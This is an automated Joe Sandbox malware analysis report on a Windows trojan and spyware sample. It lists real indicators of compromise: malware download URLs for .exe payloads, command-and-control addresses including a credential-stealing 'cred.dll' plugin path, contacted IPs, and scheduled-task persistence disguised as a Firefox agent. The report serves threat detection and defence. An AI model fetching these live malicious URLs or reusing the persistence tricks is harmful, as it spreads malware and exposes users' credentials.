                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b80%Avira URL Cloudsafe
                          http://host-data-coin-11.com/0%URL Reputationsafe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d0%Avira URL Cloudsafe
                          http://185.163.204.24/r0%Avira URL Cloudsafe
                          http://185.215.113.35/d2VxjasuwS/index.php0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                          http://185.163.204.24/a0%Avira URL Cloudsafe
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=10%Avira URL Cloudsafe
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          https://login.liUTF-8/p0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8v0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/files/8474_1641976243_3082.exe100%Avira URL Cloudmalware
                          http://Passport.NET/tb0%Avira URL Cloudsafe
                          https://login.liUTF-16p0%Avira URL Cloudsafe
                          https://login.live0%Avira URL Cloudsafe
                          http://185.163.204.24/F0%Avira URL Cloudsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://185.163.204.24/B0%Avira URL Cloudsafe
                          http://unicupload.top/install5.exe100%URL Reputationphishing
                          https://login.live.c0%Avira URL Cloudsafe
                          http://185.163.204.24/00%Avira URL Cloudsafe
                          http://crl.ver)0%Avira URL Cloudsafe
                          http://185.163.204.22/capibar100%Avira URL Cloudmalware
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8410%Avira URL Cloudsafe
                          http://185.163.204.24/as0%Avira URL Cloudsafe
                          https://185.163.204.22/capibar100%Avira URL Cloudmalware
                          http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll100%Avira URL Cloudmalware
                          https://logilive.c0%Avira URL Cloudsafe
                          http://178.62.113.205/capibar0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          unicupload.top
                          		54.38.220.85
                          		truefalse
                            		high
                            host-data-coin-11.com
                            		8.209.70.0
                            		truefalse
                              		high
                              patmushta.info
                              		94.142.143.116
                              		truefalse
                                		high
                                cdn.discordapp.com
                                		162.159.135.233
                                		truefalse
                                  		high
                                  microsoft-com.mail.protection.outlook.com
                                  		40.93.207.0
                                  		truefalse
                                    		high
                                    goo.su
                                    		104.21.38.221
                                    		truefalse
                                      		high
                                      transfer.sh
                                      		144.76.136.153
                                      		truefalse
                                        		high
                                        a0621298.xsph.ru
                                        		141.8.194.74
                                        		truefalse
                                          		high
                                          data-host-coin-8.com
                                          		8.209.70.0
                                          		truefalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://a0621298.xsph.ru/7.exefalse
                                              		high
                                              http://185.7.214.171:8080/6.phptrue
                                              • URL Reputation: malware
                                              		unknown
                                              http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://host-data-coin-11.com/false
                                              • URL Reputation: safe
                                              		unknown
                                              http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356dfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://185.215.113.35/d2VxjasuwS/index.phptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://185.215.113.35/d2VxjasuwS/index.php?scr=1true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://185.163.204.24/false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://data-host-coin-8.com/game.exefalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://data-host-coin-8.com/files/8474_1641976243_3082.exetrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://unicupload.top/install5.exetrue
                                              • URL Reputation: phishing
                                              		unknown
                                              http://185.163.204.22/capibartrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://a0621298.xsph.ru/9.exefalse
                                                		high
                                                http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.35/d2VxjasuwS/plugins/cred.dlltrue
                                                • Avira URL Cloud: malware
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://185.163.45.70/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmptrue
                                                • 12%, Virustotal, Browse
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://support.google.com/chrome/answer/6258784A7F0.exe, 0000001F.00000002.663878088.0000000005215000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80601y0svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://telegram.org/img/t_logo.pngA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/09/policytsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngA7F0.exe, 0000001F.00000002.650359326.0000000002F2A000.00000004.00000020.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_flashA7F0.exe, 0000001F.00000003.589484212.0000000005201000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000003.589577547.0000000005215000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://t.me/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpfalse
                                                              		high
                                                              http://185.163.204.24/rA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/02/scAMsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://185.163.204.24/aA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://login.liUTF-8/psvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.664193950.000000000522C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://account.live.com/InlineSignup.aspx?isvchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8vA7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.msn.com/?ocid=iehpA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600:svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603xBsvchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://Passport.NET/tbsvchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ctLMEMA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://login.liUTF-16psvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0)A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://login.livesvchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://185.163.204.24/FA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.msn.com/?ocid=iehpyA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.374781683.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362338690.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmpfalse
                                                                                                		high
                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://api.ip.sb/ip3F71.exe, 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, 3F71.exe, 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://185.163.204.24/BA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://account.live.com/msangcwamsvchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumeratesvchost.exe, 0000001E.00000002.645438848.00000232420AA000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.live.csvchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://185.163.204.24/0A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://crl.ver)svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                http://passport.net/tbsvchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEMA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gA7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b841A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://185.163.204.24/asA7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://185.163.204.22/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmptrue
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://logilive.csvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://178.62.113.205/capibarA7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsecurisvchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustpsvchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=18A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    185.163.45.70
                                                                                                                                                    		unknownMoldova Republic of
                                                                                                                                                    		39798MIVOCLOUDMDfalse
                                                                                                                                                    40.93.207.0
                                                                                                                                                    		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                    94.142.143.116
                                                                                                                                                    		patmushta.infoRussian Federation
                                                                                                                                                    		35196IHOR-ASRUfalse
                                                                                                                                                    185.215.113.35
                                                                                                                                                    		unknownPortugal
                                                                                                                                                    		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                    188.166.28.199
                                                                                                                                                    		unknownNetherlands
                                                                                                                                                    		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                    86.107.197.138
                                                                                                                                                    		unknownRomania
                                                                                                                                                    		39855MOD-EUNLfalse
                                                                                                                                                    8.209.70.0
                                                                                                                                                    		host-data-coin-11.comSingapore
                                                                                                                                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                    54.38.220.85
                                                                                                                                                    		unicupload.topFrance
                                                                                                                                                    		16276OVHFRfalse
                                                                                                                                                    162.159.135.233
                                                                                                                                                    		cdn.discordapp.comUnited States
                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                    104.21.38.221
                                                                                                                                                    		goo.suUnited States
                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                    144.76.136.153
                                                                                                                                                    		transfer.shGermany
                                                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                                                    185.233.81.115
                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                    		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                    185.7.214.171
                                                                                                                                                    		unknownFrance
                                                                                                                                                    		42652DELUNETDEtrue
                                                                                                                                                    185.186.142.166
                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                    		204490ASKONTELRUtrue
                                                                                                                                                    141.8.194.74
                                                                                                                                                    		a0621298.xsph.ruRussian Federation
                                                                                                                                                    		35278SPRINTHOSTRUfalse
                                                                                                                                                    185.163.204.22
                                                                                                                                                    		unknownGermany
                                                                                                                                                    		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                                    185.163.204.24
                                                                                                                                                    		unknownGermany
                                                                                                                                                    		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    192.168.2.1
                                                                                                                                                    127.0.0.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:553117
                                                                                                                                                    Start date:14.01.2022
                                                                                                                                                    Start time:10:42:04
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 16m 2s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:zmbGUZTICp.exe
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:48
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@61/51@81/19
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 19.1% (good quality ratio 13.1%)
                                                                                                                                                    • Quality average: 51.7%
                                                                                                                                                    • Quality standard deviation: 40.5%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 56%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 13.89.179.12, 23.211.4.86
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, microsoft.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    10:43:45Task SchedulerRun new task: Firefox Default Browser Agent EA345A35CCA4E184 path: C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    10:43:55API Interceptor1x Sleep call for process: 2DB3.exe modified
                                                                                                                                                    10:44:13API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                    10:44:22API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                    10:44:44API Interceptor4x Sleep call for process: A7F0.exe modified
                                                                                                                                                    10:44:46API Interceptor464x Sleep call for process: mjlooy.exe modified
                                                                                                                                                    10:44:48Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    No context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:MPEG-4 LOAS
